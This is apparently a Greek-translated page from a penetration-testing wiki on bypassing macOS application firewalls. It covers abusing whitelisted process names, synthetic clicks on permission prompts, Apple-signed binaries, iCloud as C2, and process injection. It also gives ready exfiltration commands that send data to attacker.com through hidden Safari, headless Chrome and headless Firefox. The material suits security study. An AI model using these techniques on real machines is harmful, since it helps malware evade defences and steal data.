macOS Bypassing Firewalls

Reading time: 3 minutes

Βρέθηκαν τεχνικές

Οι παρακάτω τεχνικές βρέθηκαν να λειτουργούν σε ορισμένες εφαρμογές firewall macOS.

Κατάχρηση ονομάτων λευκής λίστας

• Για παράδειγμα, καλώντας το κακόβουλο λογισμικό με ονόματα γνωστών διαδικασιών macOS όπως launchd

Συνθετικό Κλικ

• Αν το firewall ζητήσει άδεια από τον χρήστη, κάντε το κακόβουλο λογισμικό να κλικάρει στο επιτρέπω

Χρήση υπογεγραμμένων δυαδικών αρχείων της Apple

• Όπως curl, αλλά και άλλα όπως whois

Γνωστά domains της Apple

Το firewall θα μπορούσε να επιτρέπει συνδέσεις σε γνωστά domains της Apple όπως apple.com ή icloud.com. Και το iCloud θα μπορούσε να χρησιμοποιηθεί ως C2.

Γενική Παράκαμψη

Ορισμένες ιδέες για να προσπαθήσετε να παρακάμψετε τα firewalls

Έλεγχος επιτρεπόμενης κίνησης

Γνωρίζοντας την επιτρεπόμενη κίνηση θα σας βοηθήσει να εντοπίσετε πιθανά whitelisted domains ή ποιες εφαρμογές επιτρέπεται να έχουν πρόσβαση σε αυτά.

lsof -i TCP -sTCP:ESTABLISHED

Κατάχρηση DNS

Οι επιλύσεις DNS γίνονται μέσω της υπογεγραμμένης εφαρμογής mdnsreponder, η οποία πιθανότατα θα επιτρέπεται να επικοινωνεί με τους διακομιστές DNS.

Μέσω εφαρμογών προγράμματος περιήγησης

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Φοίνικας

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Σαφάρι

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Μέσω εισβολών διαδικασιών

Αν μπορείτε να εισάγετε κώδικα σε μια διαδικασία που επιτρέπεται να συνδεθεί σε οποιονδήποτε διακομιστή, θα μπορούσατε να παρακάμψετε τις προστασίες του τείχους προστασίας:

macOS Process Abuse

Αναφορές

• https://www.youtube.com/watch?v=UlT5KFTMn2k